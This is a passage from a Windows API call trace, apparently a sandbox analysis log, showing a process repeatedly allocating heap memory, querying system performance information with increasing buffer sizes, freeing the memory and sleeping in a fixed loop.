lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0296.894] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0296.894] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.895] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0296.895] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.896] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.896] Sleep (dwMilliseconds=0x110) [0296.914] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0296.914] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.915] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0296.915] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0296.915] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.915] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0296.918] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0296.918] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.918] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0296.920] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0296.920] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.920] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0296.920] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.921] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.921] Sleep (dwMilliseconds=0x110) [0296.938] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0296.938] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.939] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0296.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0296.939] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.939] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0296.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0296.939] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0296.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0296.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0296.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.941] Sleep (dwMilliseconds=0x110) [0296.954] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0296.954] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.954] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0296.954] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0296.955] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0296.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0296.955] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0296.956] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0296.956] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0296.956] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.957] Sleep (dwMilliseconds=0x110) [0296.970] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0296.970] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.971] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0296.971] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0296.971] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0296.972] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c0f0 [0296.972] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c0f0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c0f0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c0f0 | out: hHeap=0x2560000) returned 1 [0296.972] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0296.972] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.973] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0296.973] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.973] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.973] Sleep (dwMilliseconds=0x110) [0296.986] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0296.986] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.986] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0296.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0296.987] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0296.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0296.987] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.988] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0296.988] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0296.988] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.989] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0296.989] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.990] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.990] Sleep (dwMilliseconds=0x110) [0297.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0297.004] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0297.005] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0297.005] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0297.005] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0297.005] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.006] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0297.006] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0297.006] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.006] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0297.006] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.007] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.007] Sleep (dwMilliseconds=0x110) [0297.013] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0297.013] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.013] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0297.013] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0297.013] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.014] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0297.014] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0297.014] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.015] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0297.015] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0297.015] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.015] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0297.015] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.016] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.016] Sleep (dwMilliseconds=0x110) [0297.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0297.032] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0297.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0297.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0297.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0297.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0297.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0297.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0297.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.035] Sleep (dwMilliseconds=0x110) [0297.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0297.049] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0297.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0297.049] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0297.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0297.050] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0297.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0297.050] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0297.051] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.051] Sleep (dwMilliseconds=0x110) [0297.063] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0297.063] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.064] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0297.064] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0297.064] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.064] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0297.064] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0297.064] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.065] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0297.065] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0297.065] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.065] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0297.065] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.066] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.066] Sleep (dwMilliseconds=0x110) [0297.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0297.079] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0297.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0297.080] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.081] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0297.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0297.081] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0297.082] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0297.082] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.083] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0297.083] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.083] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.084] Sleep (dwMilliseconds=0x110) [0297.095] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0297.095] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0297.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0297.096] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0297.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0297.097] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0297.098] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0297.098] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.098] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0297.098] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.098] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.099] Sleep (dwMilliseconds=0x110) [0297.106] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0297.106] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.107] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0297.107] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0297.107] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.108] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0297.108] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0297.108] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.108] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0297.108] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0297.108] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.109] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0297.109] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.109] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.109] Sleep (dwMilliseconds=0x110) [0297.123] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0297.123] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.123] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0297.123] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0297.124] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.124] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0297.124] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0297.124] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, 